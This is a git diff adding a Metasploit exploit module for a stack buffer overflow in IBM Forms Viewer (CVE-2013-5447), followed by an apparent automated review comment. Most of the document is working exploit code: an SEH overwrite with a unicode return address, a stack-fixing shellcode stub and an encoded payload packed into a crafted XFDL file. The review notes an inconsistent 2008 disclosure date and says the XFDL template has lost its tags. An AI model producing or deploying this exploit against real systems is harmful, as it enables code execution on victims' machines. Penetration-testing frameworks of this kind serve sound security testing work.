diff --git a/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb b/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb
new file mode 100644
index 0000000000..8654db7e58
--- /dev/null
+++ b/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb
@@ -0,0 +1,122 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::FILEFORMAT + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'IBM Forms Viewer Unicode Buffer Overflow', + 'Description' => %q{ + This module exploits a stack-based buffer overflow in IBM Forms Viewer. The vulnerability + is due to a dangerous usage of strcpy-like function, and occurs while parsing malformed + XFDL files, with a long fontname value. This module has been tested successfully on IBM + Forms Viewer 4.0 on Windows XP SP3 and Windows 7 SP1. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'rgod ', # Vulnerability discovery + 'juan vazquez', # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2013-5447' ], + [ 'OSVDB', '100732' ], + [ 'ZDI', '13-274' ], + [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21657500' ], + ], + 'Payload' => + { + 'Space' => 3000, + 'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed, + 'EncoderOptions' => + { + 'BufferRegister' => 'ECX', + 'BufferOffset' => 10 + }, + 'BadChars' => (0x00..0x08).to_a.pack("C*") + (0x0b..0x1f).to_a.pack("C*") +"\x26\x3c" + (0x80..0xff).to_a.pack("C*"), + 'DisableNops' => true, + # Fix the stack before the payload is executed, so we avoid + # windows exceptions due to alignment + 'Prepend' => + "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18] + "\x83\xC0\x08" + # add eax, byte 8 + "\x8b\x20" + # mov esp, [eax] + "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'IBM Forms Viewer 4.0 / Windows XP SP3 / Windows 7 SP1', + { + 'Ret' => 0x4c30, # p/p/r unicode from masqform.exe + 'Nop' => 0x47, # 004700 => add [edi+0x0],al + 'Offset' => 62 + } + ] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Apr 03 2008', + 'DefaultTarget' => 0)) + + 
register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'msf.xfdl']), + ], self.class) + end + + def exploit + + + sploit = rand_text_alpha(target['Offset']) + sploit << "\x61\x62" # nseh # NSEH # popad (61) + nop compatible with unicode (add [edx+0x0],ah # 006200) + sploit << [target.ret].pack("v") # seh # ppr + sploit << [target['Nop']].pack("C") + sploit << payload.encoded + sploit << rand_text_alpha(4096) # make it crash + + + xfdl = %Q| + + + + 20060615 + + + A6D5583E2AD0D54E:-72C430D4:10BD8923059:-8000 + 1 + + + + + + + + + + +| + + print_status("Creating '#{datastore['FILENAME']}' file ...") + + file_create(xfdl) + + end + +end
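Review bot: The `'DisclosureDate' => 'Apr 03 2008'` in the module info is inconsistent with the rest of the metadata: every reference the module cites (CVE-2013-5447, ZDI-13-274, the IBM support docview) is a 2013 identifier, so a 2008 disclosure date predates the vulnerability's own CVE year and will mis-sort the module in framework searches. It should be the publication date of the ZDI/IBM advisory, presumably early December 2013 going by ZDI-13-274 — confirm against the advisory before changing it, e.g. `'DisclosureDate' => 'Dec 05 2013'`. While there, the `'Prepend'` stub's header comment would be clearer if it stated what it computes, e.g. `# Reset ESP from the TEB (fs:[0x18] -> TEB, +8 = StackLimit) and back off 2000 bytes so the decoder runs on a sane, aligned stack`, since the per-instruction comments only transliterate the opcodes. Note the XFDL template body in this hunk has lost its XML tags in this rendering, so the file-content side of the module could not be reviewed here.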